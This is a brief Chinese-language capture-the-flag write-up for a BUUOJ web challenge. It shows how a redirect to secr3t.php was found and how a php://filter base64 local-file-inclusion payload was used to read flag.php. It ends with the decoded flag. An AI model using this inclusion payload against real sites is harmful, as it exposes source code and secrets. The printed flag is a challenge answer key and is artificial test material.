5f5574c7-75b8-4251-befa-d89a391dafc4.node4.buuoj.cn:81/Archive_room.php 点击这个就会跳入下一个网页 发现没有东西
先返回到这个网页5f5574c7-75b8-4251-befa-d89a391dafc4.node4.buuoj.cn:81/Archive_room.php 然后再抓包看看 其实也可以知道,点击了secret之后有一个网页跳转,但是跳转之后太快了 那么现在进入这个网页看看5f5574c7-75b8-4251-befa-d89a391dafc4.node4.buuoj.cn:81/secr3t.php 看到源码后试试flag.php 发现没有
用php伪协议来读取flag.php 构造playload: ?file=php://filter/convert.base64-encode/resource=flag.php 那么就再访问下这个网址: 5f5574c7-75b8-4251-befa-d89a391dafc4.node4.buuoj.cn:81/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
尝试使用base64解密:
flag{ab23b71f-8f37-4782-8e8f-fef0a275699b}